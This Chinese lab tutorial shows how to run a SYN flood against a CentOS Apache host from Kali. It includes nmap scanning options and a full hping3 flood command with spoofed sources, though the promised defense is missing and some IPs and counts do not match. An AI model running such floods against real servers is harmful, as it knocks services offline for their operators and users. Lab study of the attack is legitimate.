DDOS 攻击防御-SYN 洪水攻击

本文章仅供学习交流

一.环境配置

攻击机:kali 2021.1 ip: 192.168.0.118 255.255.255.0
靶机:contos7.6 ip:192.168.0.116 255.255.255.0
条件:两机器要在同一局域网中,能相互访问contos开启apche服务

二.信息收集
1.Traceroute 命令也可以对路由进行跟踪

在这里插入图片描述
2.使用nmap扫描win7进行信息收集

nmap 目标ip --exclude 排除目标ip   		扫描时排除指定ip
nmap -iL 目标文件		 		扫描指定文件夹的ip
nmap -iR 目标数量				随机扫描指定iP数量
nmap -sn 目标				只探测主机是否存活,不对端口和其他信息进行扫描
nmap -sn -PR 目标				通过ARP协议扫描主机是否存活
nmap -PE 目标				过程上和ping命令无异
nmap -PP 目标				通过ICMP协议的时间戳的方式发现主机是否存活
nmap -PM 目标				通过ICMP协议的地址掩码发现主机
nmap -PS [端口,端口,端口...]  目标		通过TCP协议来扫描主机是否存活(全连接扫描)
nmap -PU 目标				通过UDP方式扫描
nmap --data-length 25 目标 			通过参数--data--length 25 来发生随机数据包
nmap --packet-trace 目标			追踪nmap发送的数据包

这里我们使用nmap -sn这个参数来判断主机是否存活,up表示存活
在这里插入图片描述
这里也可以使用nmap -sS 半连接扫描,这个方式相对于上面的要隐蔽性高些不容易被网络管理员发现
在这里插入图片描述
三.DDOS攻击-SYN洪水攻击原理和tcp三次握手原理简述(图片来自网络)
TCP三次握手的原理简说,客户机A给服务器B发一个建立连接的请求,然后服务器B收到请求,给客户机A回一个包确认是否建立连接,然后客户机A收到包,给服务器B回复一个确认建立连接完成三次握手,然后就开始传输数据了。
在这里插入图片描述

SYN洪水攻击,就是利用TCP三次握手的原理来攻击的,在服务器B收到客户机A的求建立连接包时,服务器B给客户机A回复一个确认包,然后等待客户机A给自己回包,这时服务器B在等待客户机A的回包,资源就被占用了,而客户机A这时就不回信息了,服务就一直等待,等待到规定时间内如果客户机A还是没有回消息就不等待了!当很多的客户机同时用这个方法去访问服务器时,服务器的资源就很快被占用完了,正常想访问的客户就不能访问成功,严重的会导致服务器崩溃!
在这里插入图片描述
四.使用kali对centos进行SYN洪水攻击
1.打开centos7中的apache服务,并访问网站

systemctl start httpd //开启apache服务
systemctl stop firewalld.service  //关闭防火墙

在这里插入图片描述

2.启动kali使用hping命令对靶机进行压力测试

 ┌──(root💀kali)-[~/桌面]
└─# hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.0.120

-c 1000 = 发送的数据包的数量。
-d 120 = 发送到目标机器的每个数据包的大小。单位是字节
-S = 只发送 SYN 数据包。
-w 64 = TCP 窗口大小。
-p 80 = 目的地端口(80 是 WEB 端口)。你在这里可以使用任何端口。
--flood = 尽可能快地发送数据包,不需要考虑显示入站回复。洪水攻击模式。
--rand-source = 使用随机性的源头 IP 地址。这里的伪造的 IP 地址,只是在局域中伪造。通过路
由器后,还会还原成真实的 IP 地址。

3.重新访问网站,发现网站变慢了,当我们把-c的数据改大些的时候过一会就会发现网站被干崩了,就达到了我SYN洪水攻击的目的了。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值